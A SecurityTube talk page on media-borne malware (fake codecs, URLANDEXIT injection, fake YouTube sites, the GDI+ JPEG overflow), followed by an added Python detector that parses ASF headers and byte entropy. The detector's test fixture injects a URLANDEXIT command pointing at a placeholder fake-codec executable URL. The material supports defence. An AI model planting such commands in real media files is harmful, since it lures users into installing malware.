This video is part of the Infosec Video Collection at SecurityTube.net: http://www.securitytube.net
Deepsec - Malware goes to the Movies
Dr. Aleksandr Yampolskiy, Gilt Groupe

As criminals adapt, they look for new ways to distribute malware. This talk examines new types of malware that spread through online videos, music files, and images. We begin by analyzing media-malware trends and find that most of these attacks are not targeted: they usually rely on social engineering and black-hat search engine optimization. Next, we provide a taxonomy of the attack vectors. We show that music and video files are commonly infected through URLANDEXIT script injection or DRM licensing abuse, in which the user is tricked into downloading malware posing as a "fake codec". We analyze the growing trend of fake YouTube sites covering the latest news events; these sites are often advertised through social networking sites such as Facebook, and we demonstrate how easy it is to set one up with the YTFakeCreator toolkit. We then discuss how images of Angelina Jolie have been used to exploit the GDI+ JPEG buffer overflow vulnerability (MS04-028) in the past, and how that attack is still prevalent today. Finally, we discuss protection mechanisms, ranging from OS configuration changes that disable URLANDEXIT commands to a custom tool (to be open-sourced after the talk) that can detect the malware without downloading the entire video. The tool uses some novel ideas, such as sequential download of the media file and entropy analysis to detect injected script commands.

Dr. Aleksandr Yampolskiy heads the Security and Compliance team at Gilt Groupe. He is responsible for all aspects of security: application security, protecting the company through penetration testing and auditing of the network infrastructure, establishing IT security controls, conducting security awareness training, fraud detection, and overseeing PCI compliance efforts. Prior to this position, he worked at Goldman Sachs, Oracle, and Microsoft in various capacities. He has been a lead technologist for SSO, entitlement, IDM, and identity federation solutions, and has advised various businesses on best practices for integrating security into their products while complying with internal and external policies and regulations. He has been cited in the NY Times and Yale Scientific, and has published half a dozen articles at top security conferences. In 2006 he received the Best Paper Award at the Public Key Cryptography conference for discovering the most efficient Verifiable Random Function to date. He holds a B.A. in Mathematics/Computer Science from New York University and a Ph.D. in Cryptography from Yale University.
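The two detection ideas named in the abstract, inspecting the file before the whole video is downloaded and using entropy to locate injected script text, can be shown on the ASF container (WMV/WMA) that carries URLANDEXIT commands. The script below is an added example written for this page, not the speaker's tool: it relies only on the public ASF layout (the object GUIDs are the ones from the ASF specification), while the two sample files, the placeholder "codec" URL in them, the 128-byte window and the 6.0-bit threshold are all constructed here for illustration.

```python
import hashlib
import math
import struct
import uuid

# Object GUIDs from the ASF specification. On disk a GUID is the Windows GUID
# struct (Data1/2/3 little-endian, Data4 as-is), i.e. uuid.UUID(...).bytes_le,
# which is why every real WMV/WMA file starts with the bytes 30 26 B2 75.
ASF_HEADER_OBJECT = uuid.UUID("75B22630-668E-11CF-A6D9-00AA0062CE6C").bytes_le
ASF_SCRIPT_COMMAND_OBJECT = uuid.UUID("1EFB1A30-0B62-11D0-A39B-00A0C90348F6").bytes_le
ASF_SCRIPT_COMMAND_RESERVED = uuid.UUID("4B1ACBE3-100B-11D0-A39B-00A0C90348F6").bytes_le
SUSPICIOUS_TYPES = {"URLANDEXIT"}  # script command types that send the player to a URL

def _wstr(buf, pos, nchars):
    """Read an ASF Unicode (UTF-16LE) string of nchars characters starting at pos."""
    end = pos + 2 * nchars
    if end > len(buf):
        raise EOFError("string runs past the end of the object")
    return buf[pos:end].decode("utf-16-le").rstrip("\x00"), end

def _parse_script_command_object(body):
    """Decode a Script Command Object body into (time_ms, type_name, value) triples."""
    if body[:16] != ASF_SCRIPT_COMMAND_RESERVED:
        raise ValueError("bad Script Command Object reserved GUID")
    n_cmds, n_types = struct.unpack_from("<HH", body, 16)
    pos, types, commands = 20, [], []
    for _ in range(n_types):  # command-type name table, e.g. ["URLANDEXIT", "TEXT"]
        (nchars,) = struct.unpack_from("<H", body, pos)
        name, pos = _wstr(body, pos + 2, nchars)
        types.append(name)
    for _ in range(n_cmds):  # each command: presentation time, type index, string
        time_ms, type_idx, nchars = struct.unpack_from("<IHH", body, pos)
        value, pos = _wstr(body, pos + 8, nchars)
        commands.append((time_ms, types[type_idx], value))
    return commands

def parse_script_commands(data):
    """Walk the Header Object of data (possibly just a file prefix). Returns
    (commands, complete); complete is False when the prefix ends too early."""
    if len(data) < 30:
        return [], False
    if data[:16] != ASF_HEADER_OBJECT:
        raise ValueError("not an ASF file")
    (header_size,) = struct.unpack_from("<Q", data, 16)
    commands, pos = [], 30  # sub-objects follow the 30-byte Header Object header
    while pos + 24 <= min(header_size, len(data)):
        guid, (size,) = data[pos:pos + 16], struct.unpack_from("<Q", data, pos + 16)
        if size < 24:
            raise ValueError("corrupt object size")
        if guid == ASF_SCRIPT_COMMAND_OBJECT:
            if pos + size > len(data):
                return commands, False  # the object is cut off by the prefix
            commands += _parse_script_command_object(data[pos + 24:pos + size])
        pos += size
    return commands, pos >= header_size

def scan_prefix(prefix):
    """Verdict on the bytes fetched so far: 'suspicious', 'clean', 'need-more' or 'malformed'."""
    try:
        commands, complete = parse_script_commands(prefix)
    except (ValueError, EOFError, IndexError, struct.error):
        return "malformed", []
    hits = [c for c in commands if c[1] in SUSPICIOUS_TYPES]
    if hits:
        return "suspicious", hits
    return ("clean" if complete else "need-more"), []

def shannon_entropy(chunk):
    """Bits per byte of the empirical byte distribution of chunk."""
    n = len(chunk)
    counts = [chunk.count(b) for b in set(chunk)]
    return -sum(c / n * math.log2(c / n) for c in counts) if n else 0.0

def low_entropy_windows(data, window=128, threshold=6.0):
    """(offset, bits/byte) of fixed windows below threshold. Compressed media
    scores about 6.5 bits on 128-byte samples (more on larger ones); UTF-16
    script text, a zero byte in every other position, lands well under 5."""
    scores = [(off, shannon_entropy(data[off:off + window]))
              for off in range(0, len(data) - window + 1, window)]
    return [(off, round(h, 2)) for off, h in scores if h < threshold]

def build_asf_header(types, commands):
    """Constructed fixture: a minimal Header Object with one Script Command Object
    (a real file also carries File/Stream Properties objects, irrelevant here)."""
    body = ASF_SCRIPT_COMMAND_RESERVED + struct.pack("<HH", len(commands), len(types))
    for t in types:
        body += struct.pack("<H", len(t)) + t.encode("utf-16-le")
    for time_ms, type_idx, value in commands:
        body += struct.pack("<IHH", time_ms, type_idx, len(value)) + value.encode("utf-16-le")
    obj = ASF_SCRIPT_COMMAND_OBJECT + struct.pack("<Q", 24 + len(body)) + body
    return ASF_HEADER_OBJECT + struct.pack("<Q", 30 + len(obj)) + struct.pack("<IBB", 1, 1, 2) + obj

def fake_media(nbytes):
    """Deterministic near-random filler standing in for compressed media data (constructed)."""
    return b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(nbytes // 32))

# Constructed samples: one with an injected URLANDEXIT pointing at a "codec"
# download (placeholder URL, not a real site), one with a harmless TEXT command.
INFECTED = build_asf_header(["URLANDEXIT"],
                            [(0, 0, "http://codec.example.invalid/get/WMVCodec_setup.exe")]) + fake_media(4096)
CLEAN = build_asf_header(["TEXT"], [(1500, 0, "Chapter 1")]) + fake_media(4096)
```

In a sequential download you fetch the first few kilobytes with an HTTP Range request, call scan_prefix on what you have, and fetch more only while it answers need-more; with the constructed samples the first 64 bytes are not enough, but a few hundred bytes settle the verdict, so the video body is never pulled. low_entropy_windows does not decide anything by itself: it points at the low-entropy stretches (here the header, because of the interleaved zero bytes of UTF-16 text) where injected commands are worth parsing, which matters when a file has been padded or the script object sits behind other header objects. Two caveats: the check covers only the script-command vector, not the DRM licensing trick, whose license URL lives in a different header object, and a player setting that ignores script commands is the more general fix.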